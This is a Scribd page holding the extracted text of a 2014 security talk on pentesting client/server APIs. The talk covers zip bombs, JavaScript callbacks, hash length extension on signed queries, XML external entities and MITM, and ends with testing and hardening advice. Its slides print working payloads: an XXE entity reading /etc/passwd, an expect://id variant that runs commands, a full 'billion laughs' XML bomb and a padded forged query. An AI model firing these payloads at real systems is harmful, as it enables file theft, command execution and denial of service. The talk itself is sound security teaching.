Scribd Logo
Încărcați

Bine ați venit la Scribd!

  • API Pentest

    Încărcat de

    Mr. Ramya Shah
    138 vizualizări58 pagini
    Contain about various api and all

    Drepturi de autor

    © © All Rights Reserved

    Formate disponibile

    PDF, TXT sau citiți online pe Scribd

    Vi se pare util acest document?

    Este necorespunzător acest conținut?

    Raportați acest document
    Contain about various api and all

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    138 vizualizări58 pagini

    API Pentest

    Încărcat de

    Mr. Ramya Shah
    Contain about various api and all

    Drepturi de autor:

    © All Rights Reserved
    Descărcați ca PDF, TXT sau citiți online pe Scribd
    Indicator pentru conținut neadecvat
    din 58

    Pentesting client/server API

    Sergey Belov
    $ whoami

    • Senior Security Auditor at Digital Security


    • BugHunter: Google, Yandex, Badoo, Yahoo +++
    • Writer: habrahabr, Xakep magazine
    • CTF: DEFCON 2012 CTF Final, Chaos Construction
    CTF’2013
    • Speaker: CodeFest 2012, ZeroNights 0x03
    • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
    © 2002—2014, Digital Security 2
    What are we talking about?

    API

    © 2002—2014, Digital Security 3


    What are we talking about?

    API

    © 2002—2014, Digital Security 4


    Hacking via API

    © 2002—2014, Digital Security 5


    Hacking via API

    © 2002—2014, Digital Security 6


    Hacking via API

    From interface to API methods

    © 2002—2014, Digital Security 7


    Hacking via API

    © 2002—2014, Digital Security 8


    Hacking via API

    © 2002—2014, Digital Security 9


    Hacking via API

    © 2002—2014, Digital Security 10


    Hacking via API

    © 2002—2014, Digital Security 11


    Hacking via API

    What should we test?


    • Logic!
    • Bypassing restrictions (sqli/xss)
    • Parameter tampering
    Developing
    • Stop hacks and custom implementation in API! Really

    © 2002—2014, Digital Security 12


    Hacking via API

    © 2002—2014, Digital Security 13


    Hacking via API

    ZIP
    © 2002—2014, Digital Security 14
    Hacking via API

    42 Kb…

    © 2002—2014, Digital Security 15


    Hacking via API

    42 Kb…
    …10 Gb?

    © 2002—2014, Digital Security 16


    Hacking via API

    42 Kb…
    …10 Gb?
    …100 Gb?

    © 2002—2014, Digital Security 17


    Hacking via API

    42 Kb…
    …10 Gb?
    …100 Gb?
    …100 Tb?

    © 2002—2014, Digital Security 18


    Hacking via API

    42 Kb…
    …10 Gb?
    …100 Gb?
    …100 Tb?

    © 2002—2014, Digital Security


    …4.5 Pb! http://www.unforgettable.dk/
    19
    Hacking via API

    Say
    HELLO
    to
    © 2002—2014, Digital Security
    ZIP BOMB! 20
    Hacking via API

    The evil of JavaScript


    and

    © 2002—2014, Digital Security 21


    Hacking via API

    © 2002—2014, Digital Security 22


    Hacking via API

    © 2002—2014, Digital Security 23


    Hacking via API

    http://habrahabr.ru/post/186160/
    © 2002—2014, Digital Security 24
    Hacking via API

    Crypto
    © 2002—2014, Digital Security 25
    Hacking via API

    Query signing
    Sign = sha*(…+DATA+…)

    APIkey 26
    © 2002—2014, Digital Security
    Hacking via API

    © 2002—2014, Digital Security 27


    Hacking via API

    But why?
    © 2002—2014, Digital Security 28
    Hacking via API

    Say hello again.


    To length extension attack
    © 2002—2014, Digital Security 29
    Hacking via API

    A=1&B=2&C=3
    07ce36c769ae130708258fb5dfa3d37ca5a67514
    TOKEN=sha1(KEY+DATA)

    © 2002—2014, Digital Security 30


    Hacking via API

    Some have hijacked just 1 request…

    © 2002—2014, Digital Security 31


    Hacking via API

    What does the attacker know?


    • Original data
    • Sign (token)

    © 2002—2014, Digital Security 32


    Hacking via API

    What does the attacker want?

    Change some data / change params


    © 2002—2014, Digital Security 33
    Hacking via API

    A=1&B=2&C=3\x80\x00\x00…\x02&C=4

    © 2002—2014, Digital Security 34


    Hacking via API

    Can sign new query without API key!


    Vkontakte: sig = md5(name1=value1name2=value2api_secret)
    Mail.RU sig = md5(uid + params + private_key)

    http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
    © 2002—2014, Digital Security 35
    Hacking via API

    Request hijacking…
    How?

    © 2002—2014, Digital Security 36


    Hacking via API

    © 2002—2014, Digital Security 37


    Hacking via API

    © 2002—2014, Digital Security 38


    Hacking via API

    © 2002—2014, Digital Security 39


    Hacking via API

    © 2002—2014, Digital Security 40


    Hacking via API

    © 2002—2014, Digital Security 41


    Hacking via API

    © 2002—2014, Digital Security 42


    Hacking via API

    © 2002—2014, Digital Security 43


    Hacking via API

    © 2002—2014, Digital Security 44


    Hacking via API

    XML? XML entities!

    © 2002—2014, Digital Security 45


    Hacking via API

    DTD Example:

    <!ENTITY writer "Donald Duck.">


    <!ENTITY copyright "Copyright W3Schools.">

    XML example:

    <author>&writer;&copyright;</author>

    © 2002—2014, Digital Security 46


    Hacking via API

    XML entities?
    External Entity!
    © 2002—2014, Digital Security 47
    Hacking via API

    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM
    "file:///etc/passwd" >]>

    <foo>&xxe;</foo>
    © 2002—2014, Digital Security 48
    Hacking via API

    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM
    “expect://id" >]>

    <foo>&xxe;</foo>
    © 2002—2014, Digital Security 49
    Hacking via API

    XML Bombs!
    © 2002—2014, Digital Security 50
    Hacking via API
    <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
    (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
    <lolz>&lol9;</lolz>
    © 2002—2014, Digital Security 51
    What are we talking about?

    Man in the Middle

    © 2002—2014, Digital Security 52


    Hacking via API

    Examples?

    © 2002—2014, Digital Security 53


    Hacking via API

    2013-11-19 by Reginaldo Silva


    © 2002—2014, Digital Security 54
    Hacking via API

    https://www.facebook.com/BugBounty/posts/778897822124446
    http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
    © 2002—2014, Digital Security 55
    Hacking via API

    Testing:
    • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
    • XXE to RCE https://gist.github.com/joernchen/3623896

    Development:
    • Disable entities

    © 2002—2014, Digital Security 56


    Hacking via API

    Finally:
    • Re-test all interface restrictions;
    • Specific compressions;
    • JS callbacks;
    • Crypto + SSL test + hardcoded credentials (hackapp.com);
    • XML - XXE;
    • Anything else :]
    © 2002—2014, Digital Security 57
    Hacking via API

    Thanks for your attention!


    Questions?

    Digital Security в Москве: (495) 223-07-86


    Digital Security в Санкт-Петербурге: (812) 703-15-47
    twitter.com/sergeybelove
    sbelov@dsec.ru
    © 2002—2014, Digital Security 58

    S-ar putea să vă placă și